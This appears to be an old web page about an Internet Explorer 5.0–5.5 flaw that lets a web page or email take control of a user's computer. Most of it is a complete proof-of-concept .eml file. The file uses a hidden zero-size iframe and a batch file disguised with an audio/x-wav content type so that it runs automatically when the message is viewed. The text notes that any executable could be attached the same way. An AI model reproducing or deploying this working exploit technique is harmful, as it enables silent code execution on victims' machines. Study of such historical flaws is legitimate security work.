Internet Explorer has a very serious
security hole that can be exploited. This hole allows a web-page to take control
of a user's computer. For the
exploit to be successful,
you must be using Internet Explorer 5.0 through 5.5 and, for this particular exmample, Windows Media Player 6.0. If you upgrade to Windows Media Player 7.0, the following example will not work. The exploit uses
IFRAMES and
multipart-related MIME entities, along with certain content-types that IE doesn't quite know how to handle.
The following example is based on the fact that IE does not
know how to correctly handle the audio/x-wav
content-type.
A person could
attach an executable file, or a .bat file like I have included, and it will run automatically.
Source code to example of IE 5.0-5.5 exploit:
(just cut-n-paste the source code into a file called anything.eml and view it in Outlook Express or Internet Explorer)
To: victim
From: flood
Subject: bad mail
Date: Thu, 4 Apr 2001 13:27:33 +1000
MIME-Version: 1.0
Content-Type: multipart/related;
boundary="egg"
This is a syntactically correct MIME message.
But it is semantically evil...
--egg
Content-Type: multipart/alternative;
boundary="deadfrog"
--deadfrog
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:ATTACHED-CONTENT-ID-1
height=3D0 width=3D0></iframe>
Whistles innocently...<BR>
</BODY>
</HTML>
--deadfrog--
--egg
Content-Type: audio/x-wav;
name="hello.bat"
Content-Transfer-Encoding: quoted-printable
Content-ID: <ATTACHED-CONTENT-ID-1>
echo OFF
dir C:\
ping www.yahoo.com
debug
pause
--egg--